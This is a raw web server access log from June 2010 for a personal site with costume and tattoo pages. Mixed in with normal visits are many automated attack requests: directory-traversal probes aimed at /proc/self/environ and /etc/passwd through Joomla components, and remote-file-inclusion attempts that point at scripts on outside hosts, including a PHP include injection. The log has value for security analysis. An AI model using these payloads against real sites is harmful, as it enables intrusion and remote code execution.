27.248.26.128 - - [27/Jun/2010:04:57:37 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
27.248.26.128 - - [27/Jun/2010:04:57:45 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
207.191.229.96 - - [27/Jun/2010:04:58:33 -0500] "GET /logs/access_log.1275696000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
207.191.229.96 - - [27/Jun/2010:04:58:34 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.191.229.96 - - [27/Jun/2010:04:58:34 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
207.191.229.96 - - [27/Jun/2010:04:59:11 -0500] "GET /logs/access_log.1275696000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
207.191.229.96 - - [27/Jun/2010:04:59:11 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.191.229.96 - - [27/Jun/2010:04:59:11 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
87.253.135.181 - - [27/Jun/2010:05:00:25 -0500] "GET /logs/access_log.1276473600//index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
87.253.135.181 - - [27/Jun/2010:05:00:25 -0500] "GET //index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.253.135.181 - - [27/Jun/2010:05:00:26 -0500] "GET /logs//index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.253.135.181 - - [27/Jun/2010:05:03:09 -0500] "GET /logs/access_log.1276473600//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.253.135.181 - - [27/Jun/2010:05:03:09 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.253.135.181 - - [27/Jun/2010:05:03:09 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
207.191.229.96 - - [27/Jun/2010:05:04:20 -0500] "GET /logs/access_log.1275696000//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
207.191.229.96 - - [27/Jun/2010:05:04:20 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
207.191.229.96 - - [27/Jun/2010:05:04:20 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
208.43.133.148 - - [27/Jun/2010:05:05:33 -0500] "GET /logs/access_log.1274054400/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.819"
208.43.133.148 - - [27/Jun/2010:05:05:34 -0500] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.819"
208.43.133.148 - - [27/Jun/2010:05:05:34 -0500] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.819"
195.225.170.108 - - [27/Jun/2010:05:07:47 -0500] "GET /logs/access_log.1274918400/*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
114.108.128.118 - - [27/Jun/2010:05:11:19 -0500] "GET ////write_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.805"
211.206.120.196 - - [27/Jun/2010:05:12:03 -0500] "GET ////write_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.79"
66.249.71.144 - - [27/Jun/2010:05:13:18 -0500] "GET /tattoo HTTP/1.1" 301 330 "-""DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.249.71.144 - - [27/Jun/2010:05:13:19 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "-""DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
200.202.243.41 - - [27/Jun/2010:05:15:36 -0500] "GET /logs/access_log.1275696000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:05:15:37 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:05:15:37 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:05:16:27 -0500] "GET /logs/access_log.1275696000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:05:16:27 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:05:16:28 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
211.206.120.196 - - [27/Jun/2010:05:17:00 -0500] "GET /*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.79"
114.108.128.118 - - [27/Jun/2010:05:17:14 -0500] "GET /*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.805"
87.253.135.181 - - [27/Jun/2010:05:20:09 -0500] "GET //index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
218.145.71.241 - - [27/Jun/2010:05:21:29 -0500] "GET //index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
218.145.71.241 - - [27/Jun/2010:05:21:36 -0500] "GET //index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.48.78.106 - - [27/Jun/2010:05:21:39 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 GTB7.0"
200.202.243.41 - - [27/Jun/2010:05:22:15 -0500] "GET /logs/access_log.1275696000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:05:22:16 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:05:22:17 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:05:22:53 -0500] "GET /logs/access_log.1275696000//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:05:22:54 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:05:22:55 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
200.175.239.226 - - [27/Jun/2010:05:23:05 -0500] "GET /logs/access_log.1276732800//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.dyesscreek.com/famtree/documents/ID-RFI.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
200.175.239.226 - - [27/Jun/2010:05:23:06 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.dyesscreek.com/famtree/documents/ID-RFI.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
200.175.239.226 - - [27/Jun/2010:05:23:06 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.dyesscreek.com/famtree/documents/ID-RFI.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
200.202.243.41 - - [27/Jun/2010:05:24:13 -0500] "GET /logs/access_log.1275696000//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:05:24:13 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:05:24:14 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
202.62.103.120 - - [27/Jun/2010:05:24:28 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 285 "-""libwww-perl/5.834"
67.195.112.180 - - [27/Jun/2010:05:25:36 -0500] "GET /?M=D HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.202.243.41 - - [27/Jun/2010:05:27:23 -0500] "GET /logs/access_log.1275696000//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:05:27:23 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:05:27:26 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
204.51.97.195 - - [27/Jun/2010:05:30:26 -0500] "GET /logs/errors.php?error=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.51.97.195 - - [27/Jun/2010:05:30:26 -0500] "GET /logs/access_log.1266710400%20%20/errors.php?error=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
204.51.97.195 - - [27/Jun/2010:05:30:26 -0500] "GET /errors.php?error=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.51.97.195 - - [27/Jun/2010:05:30:35 -0500] "GET /logs/access_log.1266710400%20%20/errors.php?error=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
204.51.97.195 - - [27/Jun/2010:05:30:35 -0500] "GET /logs/errors.php?error=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.51.97.195 - - [27/Jun/2010:05:30:35 -0500] "GET /errors.php?error=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.51.97.195 - - [27/Jun/2010:05:30:36 -0500] "GET /errors.php?error=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.51.97.195 - - [27/Jun/2010:05:30:36 -0500] "GET /logs/errors.php?error=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.51.97.195 - - [27/Jun/2010:05:30:36 -0500] "GET /logs/access_log.1266710400%20%20/errors.php?error=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
204.51.97.195 - - [27/Jun/2010:05:30:54 -0500] "GET /logs/access_log.1266710400%20%20/errors.php?error=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
204.51.97.195 - - [27/Jun/2010:05:30:54 -0500] "GET /errors.php?error=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.51.97.195 - - [27/Jun/2010:05:30:54 -0500] "GET /logs/errors.php?error=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.51.97.195 - - [27/Jun/2010:05:31:02 -0500] "GET /logs/errors.php?error=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.51.97.195 - - [27/Jun/2010:05:31:02 -0500] "GET /errors.php?error=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.51.97.195 - - [27/Jun/2010:05:31:02 -0500] "GET /logs/access_log.1266710400%20%20/errors.php?error=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
114.108.128.118 - - [27/Jun/2010:05:31:22 -0500] "GET /logs/access_log.1274572800/*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.805"
114.108.128.118 - - [27/Jun/2010:05:31:23 -0500] "GET /*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.805"
114.108.128.118 - - [27/Jun/2010:05:31:24 -0500] "GET /logs/*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.805"
67.195.112.180 - - [27/Jun/2010:05:32:27 -0500] "GET /logs/access_log.1223251200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.253.135.181 - - [27/Jun/2010:05:34:00 -0500] "GET /logs/access_log.1276473600//index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
87.253.135.181 - - [27/Jun/2010:05:34:00 -0500] "GET //index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.253.135.181 - - [27/Jun/2010:05:34:00 -0500] "GET /logs//index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
114.108.128.118 - - [27/Jun/2010:05:34:04 -0500] "GET /logs/access_log.1274832000/*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.805"
202.62.103.120 - - [27/Jun/2010:05:36:43 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 285 "-""libwww-perl/5.834"
67.195.112.180 - - [27/Jun/2010:05:41:16 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.145.71.241 - - [27/Jun/2010:05:42:09 -0500] "GET /logs/access_log.1276041600//index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
218.145.71.241 - - [27/Jun/2010:05:42:09 -0500] "GET /logs/access_log.1276041600//index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
218.145.71.241 - - [27/Jun/2010:05:42:09 -0500] "GET //index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
218.145.71.241 - - [27/Jun/2010:05:42:09 -0500] "GET //index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
218.145.71.241 - - [27/Jun/2010:05:42:10 -0500] "GET /logs//index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
218.145.71.241 - - [27/Jun/2010:05:42:10 -0500] "GET /logs//index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.206.120.196 - - [27/Jun/2010:05:44:30 -0500] "GET /logs/access_log.1274832000/*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.79"
211.206.120.196 - - [27/Jun/2010:05:44:31 -0500] "GET /*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.79"
211.206.120.196 - - [27/Jun/2010:05:44:31 -0500] "GET /logs/*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.79"
67.30.129.57 - - [27/Jun/2010:05:46:26 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
67.30.129.57 - - [27/Jun/2010:05:46:28 -0500] "GET /logs/access_log.1266710400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
67.30.129.57 - - [27/Jun/2010:05:46:28 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.30.129.57 - - [27/Jun/2010:05:46:28 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
67.30.129.57 - - [27/Jun/2010:05:46:28 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.30.129.57 - - [27/Jun/2010:05:46:29 -0500] "GET /logs/access_log.1266710400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.145.71.241 - - [27/Jun/2010:05:49:32 -0500] "GET /logs/access_log.1275868800//index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
218.145.71.241 - - [27/Jun/2010:05:49:37 -0500] "GET /logs/access_log.1275868800//index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.250.252.241 - - [27/Jun/2010:05:56:04 -0500] "GET /logs/access_log.1240444800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
124.38.187.59 - - [27/Jun/2010:05:59:05 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
124.38.187.59 - - [27/Jun/2010:05:59:05 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
124.38.187.59 - - [27/Jun/2010:05:59:05 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
124.38.187.59 - - [27/Jun/2010:05:59:05 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
124.38.187.59 - - [27/Jun/2010:05:59:05 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.52.150.147 - - [27/Jun/2010:06:07:50 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.seowlyx.com/includes/id.jpg? HTTP/1.1" 404 309 "-""libwww-perl/5.831"
87.118.96.160 - - [27/Jun/2010:06:09:51 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://personnel.exclusive-company.ru/pek1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
87.118.96.160 - - [27/Jun/2010:06:09:51 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://personnel.exclusive-company.ru/pek1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
87.118.96.160 - - [27/Jun/2010:06:09:56 -0500] "GET /logs/access_log.1266710400//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://personnel.exclusive-company.ru/pek1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
72.52.150.147 - - [27/Jun/2010:06:10:26 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.seowlyx.com/includes/fx1.jpg??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
72.52.150.147 - - [27/Jun/2010:06:10:26 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.seowlyx.com/includes/fx1.jpg??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
72.52.150.147 - - [27/Jun/2010:06:10:26 -0500] "GET /logs/access_log.1274572800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.seowlyx.com/includes/fx1.jpg??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
72.52.150.147 - - [27/Jun/2010:06:11:36 -0500] "GET /logs/access_log.1266710400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.seowlyx.com/includes/fx1.jpg??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
87.118.96.160 - - [27/Jun/2010:06:12:50 -0500] "GET /logs/access_log.1266710400//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://personnel.exclusive-company.ru/pek1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
87.118.96.160 - - [27/Jun/2010:06:12:50 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://personnel.exclusive-company.ru/pek1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
87.118.96.160 - - [27/Jun/2010:06:12:50 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://personnel.exclusive-company.ru/pek1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
90.230.4.134 - - [27/Jun/2010:06:14:54 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "http://www.google.se/url?sa=t&source=web&cd=1&ved=0CBkQFjAA&url=http%3A%2F%2Ftomdolan.pconline.com%2Ftattoo%2Ftattoo1.htm&rct=j&q=bert+grimm+tattoo+flash&ei=qjInTLGZA5ySOPD1vOoC&usg=AFQjCNHjrXnOYOTb8B7m3-3jlFkAbM0Ulw""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
90.230.4.134 - - [27/Jun/2010:06:14:54 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
90.230.4.134 - - [27/Jun/2010:06:15:00 -0500] "GET /tattoo/set1.htm HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
90.230.4.134 - - [27/Jun/2010:06:15:00 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
90.230.4.134 - - [27/Jun/2010:06:15:00 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
90.230.4.134 - - [27/Jun/2010:06:15:00 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
90.230.4.134 - - [27/Jun/2010:06:15:00 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
90.230.4.134 - - [27/Jun/2010:06:15:00 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
90.230.4.134 - - [27/Jun/2010:06:15:00 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
90.230.4.134 - - [27/Jun/2010:06:15:00 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
90.230.4.134 - - [27/Jun/2010:06:15:00 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
